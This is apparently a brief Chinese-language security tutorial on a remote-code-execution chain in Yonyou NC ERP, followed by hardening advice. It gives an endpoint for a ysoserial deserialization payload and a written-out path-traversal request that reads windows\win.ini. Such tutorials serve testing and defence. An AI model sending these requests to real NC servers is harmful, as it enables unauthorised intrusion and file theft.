用友 NC 反序列化与接口 RCE 利用:UAPortal 反序列化、NCFind 路径穿越、RCE 利用、防御加固。
写在前面:合法学习边界
用友 NC 攻击只在授权测试环境进行。
一、用友 NC RCE 利用链

1
| ① 发现 NC → ② UAPortal 反序列化 → ③ NCFind 路径穿越 → ④ RCE
|
二、利用步骤
1
2
3
4
5
6
7
| UAPortal 反序列化:
POST /uaportal/dispatcher
Content-Type: application/x-www-form-urlencoded
→ ysoserial payload → RCE
NCFind 路径穿越:
GET /NCFindWay?unitid=..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
|
三、防御加固
1
2
3
| 升级到官方安全版本
WAF 拦截反序列化 payload
关闭不必要端口(8080/8090/8181)
|
四、小结
用友 NC 是国产 ERP 漏洞最多的系统之一。防御核心是升级版本 + WAF 防护。